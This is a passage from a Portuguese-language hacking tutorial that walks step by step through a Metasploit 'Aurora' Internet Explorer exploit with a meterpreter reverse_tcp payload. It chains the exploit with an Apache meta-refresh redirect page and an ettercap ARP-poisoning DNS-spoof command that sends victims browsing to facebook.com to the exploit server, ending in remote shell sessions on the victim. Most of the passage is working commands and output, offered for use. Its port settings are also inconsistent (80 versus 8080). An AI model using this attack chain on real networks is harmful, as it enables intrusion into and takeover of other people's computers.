         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > use exploit/windows/browser/ms10_002_aurora
msf  exploit(ms10_002_aurora) > 

  Vou utilizar do Payload reverse_tcp então vamos a diante.

1 - msf  exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
1 - PAYLOAD => windows/meterpreter/reverse_tcp
2 - msf  exploit(ms10_002_aurora) > set LHOST 10.1.1.7
2 - LHOST => 10.1.1.7
3 - msf  exploit(ms10_002_aurora) > set SRVPORT 80
4 - SRVPORT => 8080
msf  exploit(ms10_002_aurora) > 

  1 - Setagem do Payload que vou estar usando no caso reverse_tcp para efetuar conexão reversa.
  2 - Setagem do host que vai ficar escutando para a conexão reversa, por padrão a porta
utilizada é a 4444, se quiserem mudar para outra porta é set LPORT porta
  3 - Setagem do endereco do servidor que vai ficar ativo para a vítima acessar.
  4 - Setagem da porta que o servidor vai usar no meu caso a porta 80 

  Agora vamos rodar:

1 - msf  exploit(ms10_002_aurora) > exploit
1 - [*] Exploit running as background job.

2 - [*] Started reverse handler on 10.1.1.7:4444 
3 - [*] Using URL: http://10.1.1.7:8080/2NvoSlFFh
4 - [*] Server started.
msf  exploit(ms10_002_aurora) > 

  1 - Comando para executar o exploit, 
  2 - Reparem que o handler para conexão reversa foi dado start e está escutando na porta 4444
  3 - URL para executar o exploit http://10.1.1.7:80/2NvoSlFFh
  4 - O servidor foi iniciado.

  Bem agora temos um problema que é fazer redirecionar para 10.1.1.7:8080/2NvoSlFFh pois o DNS
Spoofing é possível apenas redirecionar para o IP desejado, com isso vou usar o Apache Server
e criar um HTML simples para efetuar o redirecionamento para http://10.1.1.7:8080/2NvoSlFFh =D

  $cd /var/www
  $nano index.html

  Vamos apagar o conteúdo da index.html e colar o seguinte:

<html>
<head>
<meta http-equiv='refresh' content='0;url=http://10.1.1.7:8080/2NvoSlFFh'>
</head>
<body>
</body>
</html>

  Ao carregar a página ele vai ser jogado para o endereco que queremos =D, 
para salvar CTRL+O e para sair CTRL+X

  Basta agora rodar o ettercap : ettercap -T -q -M arp -i wlan0 -P dns_spoof //
  
  E ao tentar acessar o facebook.com >>

msf  exploit(ms10_002_aurora) > 
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 10.1.1.8

  Bingo Exploit Successful, basta aguartar um pouco e depois dar um sessions -l
para a listagem de sessões e depois sessions -i id_da_sessão e estamos dentro =)

  0x04 - Conclusão

  Bem o Artigo fala por si só então o que tenho para concluir é que o perigo pode
estar onde você menos espera ;D

  Espero que todos tenham gostado desse paper e usem com moderacão ;D

  Referências:

  http://www.metasploit.com/modules/exploit/windows/browser/ms10_002_aurora
  http://openmaniak.com/ettercap.php
  http://drkmario.blogspot.com.br/2007/03/usando-o-ettercap.html
  http://grouper.ieee.org/groups/802/11/
  http://www.infowester.com/wifi.php